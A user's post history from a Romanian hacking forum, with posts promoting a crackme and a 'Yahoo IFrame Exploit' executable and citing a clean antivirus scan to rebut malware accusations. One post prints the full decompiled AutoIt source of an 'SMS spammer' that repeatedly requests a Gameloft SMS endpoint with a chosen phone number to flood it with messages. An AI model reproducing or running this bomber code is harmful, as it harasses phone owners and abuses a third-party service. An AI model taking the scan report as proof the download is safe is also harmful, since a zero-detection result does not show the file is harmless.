Mecanik2
-
Posts
11 -
Joined
-
Last visited
Posts posted by Mecanik2
-
-
Salutare,am facut si eu un "mic" challenge pentru voi!
De aici vom vedea,cine (sau cati) de pe acest forum sunt adevarati HACKERI!
Spargeti acest EXE si aflati "username" si "password".
Gasiti datele corecte,si vi se va deschide un Exploit nou nout de la HaDes [yahoo]
Nu faceti smecherii de genul FAKE.
Postati screenshotul reusitei aici.
Linkul : GirlShare - Download CrackMe.EXE
L.E: Daca doriti un hint ceva,strigati pe aici........
-
Bah VIRUSATILOR! VOI NU VEDETI CA VOI SUNTETI AIA VIRUSATI?
Uite dovada clara in ochii aia mari ai vostrii,pentru asta iau eu ban:
File name:
Yahoo IFrame Exploit.exe
Submission date:
2011-12-15 20:38:15 (UTC)
Current status:
finished
Antivirus Version Last Update Result
AhnLab-V3 2011.12.15.00 2011.12.15 -
AntiVir 7.11.19.132 2011.12.15 -
Antiy-AVL 2.0.3.7 2011.12.15 -
Avast 6.0.1289.0 2011.12.15 -
AVG 10.0.0.1190 2011.12.15 -
BitDefender 7.2 2011.12.15 -
ByteHero 1.0.0.1 2011.12.07 -
CAT-QuickHeal 12.00 2011.12.14 -
ClamAV 0.97.3.0 2011.12.15 -
Commtouch 5.3.2.6 2011.12.15 -
Comodo 15967 2011.12.15 -
DrWeb 5.0.2.03300 2011.12.15 -
Emsisoft 5.1.0.11 2011.12.15 -
eSafe 7.0.17.0 2011.12.15 -
eTrust-Vet 37.0.9626 2011.12.15 -
F-Prot 4.6.5.141 2011.12.14 -
F-Secure 9.0.16440.0 2011.12.15 -
Fortinet 4.3.388.0 2011.12.15 -
GData 22.308/22.579 2011.12.15 -
Ikarus T3.1.1.109.0 2011.12.15 -
Jiangmin 13.0.900 2011.12.15 -
K7AntiVirus 9.119.5696 2011.12.15 -
Kaspersky 9.0.0.837 2011.12.15 -
McAfee 5.400.0.1158 2011.12.15 -
McAfee-GW-Edition 2010.1E 2011.12.15 -
Microsoft 1.7903 2011.12.15 -
NOD32 6715 2011.12.15 -
Norman 6.07.13 2011.12.15 -
nProtect 2011-12-15.02 2011.12.15 -
Panda 10.0.3.5 2011.12.15 -
PCTools 8.0.0.5 2011.12.15 -
Prevx 3.0 2011.12.15 -
Rising 23.88.03.01 2011.12.15 -
Sophos 4.72.0 2011.12.15 -
SUPERAntiSpyware 4.40.0.1006 2011.12.15 -
Symantec 20111.2.0.82 2011.12.15 -
TheHacker 6.7.0.1.359 2011.12.15 -
TrendMicro 9.500.0.1008 2011.12.15 -
TrendMicro-HouseCall 9.500.0.1008 2011.12.15 -
VBA32 3.12.16.4 2011.12.14 -
VIPRE 11259 2011.12.15 -
ViRobot 2011.12.15.4827 2011.12.15 -
VirusBuster 14.1.118.0 2011.12.15 -
Additional information
MD5 : 7d6e8d06305308d511184ec8f32f3ddf
SHA1 : aae1f1b4ad532b688ded57bf4f50ae45309c91d6
SHA256: 01e55049a4547c1e46aea011bfccfb9c5ee93c69ad73b96adaab061f7257d0e5
ssdeep: 768:D3itz2Hr0OvDlWcI5Y/mquJb2XPz05qvfavJUjO:DStqHr0WDlhnu12fKJV
File size : 48128 bytes
First seen: 2011-09-11 20:44:17
Last seen : 2011-12-15 20:38:15
TrID:
Generic CIL Executable (.NET, Mono, etc.) (72.5%)
Windows Screen Saver (12.9%)
Win32 Executable Generic (8.4%)
Win16/32 Executable Delphi generic (2.0%)
Generic Win/DOS Executable (1.9%)
sigcheck:
publisher....: n/a
copyright....: Copyright © 2011
product......: Yahoo IFrame Exploit
description..: Yahoo IFrame Exploit
original name: Yahoo IFrame Exploit.exe
internal name: Yahoo IFrame Exploit.exe
file version.: 1.0.0.0
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
-----------------------------------------
Da`van...
-
Intelegeti. Vam dat sursa destul de clar. Daca GAMELOFT sau uitat peste loguri (peste sunt loguri),si au vazut ca se trimit mesaje in prostie,este si normal ca ori au scos linku,ori au restrictionat accesul;
Asadar,programul trimite comanda,si raspunde "succes".
Programul nu are setari care sa arate daca linkul mai exista sau nu!
Deci pana la urma tot la PHP ajungem,asa ca am sa fac eu script pt toti membrii RST mocca!
P.S Mecanik = gm_dizzy Banat pentru o prostie!
- 1
-
Ia lasa vrajeala,l-am decriptat este facut in AutoIT3
AVETI AICI SURSA PROGRAMULUI MOCCA!
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=ico\delete.ico
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_Res_Comment=Powered B.y Cyber | www.mortal-team.net
#AutoIt3Wrapper_Res_Description=Powered B.y Cyber | www.mortal-team.net
#AutoIt3Wrapper_Res_Fileversion=0.0.0.3
#AutoIt3Wrapper_Res_Fileversion_AutoIncrement=p
#AutoIt3Wrapper_Res_LegalCopyright=Powered B.y Cyber | www.mortal-team.net
#AutoIt3Wrapper_Res_SaveSource=y
#AutoIt3Wrapper_Res_Field=Powered B.y Cyber|www.mortal-team.net
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <IE.au3>
Global $nr_tel
$Form1 = GUICreate("Spammer sms turbo * 3 By Cyber!", 305, 78, -1, -1, -1, BitOR($WS_EX_TOOLWINDOW,$WS_EX_TOPMOST,$WS_EX_WINDOWEDGE))
GUISetBkColor(0x000000)
$Group1 = GUICtrlCreateGroup("Settings", 4, 2, 297, 73)
$Label1 = GUICtrlCreateLabel("Phone number:", 12, 18, 89, 17)
GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Input1 = GUICtrlCreateInput("07", 104, 16, 185, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL,$ES_NUMBER), BitOR($WS_EX_CLIENTEDGE,$WS_EX_STATICEDGE))
GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
GUICtrlSetBkColor(-1, 0xFF0000)
$Label2 = GUICtrlCreateLabel("Sent:", 12, 48, 34, 17)
GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Input2 = GUICtrlCreateInput("5", 50, 42, 81, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL,$ES_NUMBER), BitOR($WS_EX_CLIENTEDGE,$WS_EX_STATICEDGE))
GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
GUICtrlSetBkColor(-1, 0xFF0000)
$Button1 = GUICtrlCreateButton("Start!", 136, 40, 67, 25, $WS_GROUP, $WS_EX_STATICEDGE)
GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
GUICtrlSetCursor (-1, 0)
$Button2 = GUICtrlCreateButton("Stop!", 207, 40, 67, 25, $WS_GROUP, $WS_EX_STATICEDGE)
GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
gomsg()
Case $Button2
Exit
EndSwitch
WEnd
Func gomsg()
For $i = 1 To GUICtrlRead($Input2) Step 1
$nr_tel = GUICtrlRead($Input1)
$oIE = _IECreate ("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone="&$nr_tel&"&country=175&operator=329", 0,0,1)
_IEQuit($oIE)
Next
MsgBox(64,"Info","Finish!")
EndFuncDin cate se vede face apel la
http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone="&$nr_tel&"&country=175&operator=329"
Iar functia e:
Func gomsg()
For $i = 1 To GUICtrlRead($Input2) Step 1
$nr_tel = GUICtrlRead($Input1)
$oIE = _IECreateLogic ca aia au loguri,si au scos linkul
Have a nice day
- 1
-
Da asa este,dar se pare ca o gramada mare de copii care se cred "hackeri" nu stie sa faca diferenta dintre un virus si un program scris in VB care nu ruleaza daca nu are NTF4.
Fratilor,eu in daca eram staff aici faceam in asa fel sa nu se poata inregistra orice copil BUT care nici macar nu stie cu ce se mananca Hackingul.
P.S Multumesk de ban pentru un program CLEAN.
OS exploiting and DDOS
in Challenges (CTF)
Posted
Am sa folosesc vpn-ul meu...
Sa vedem cat rezista xD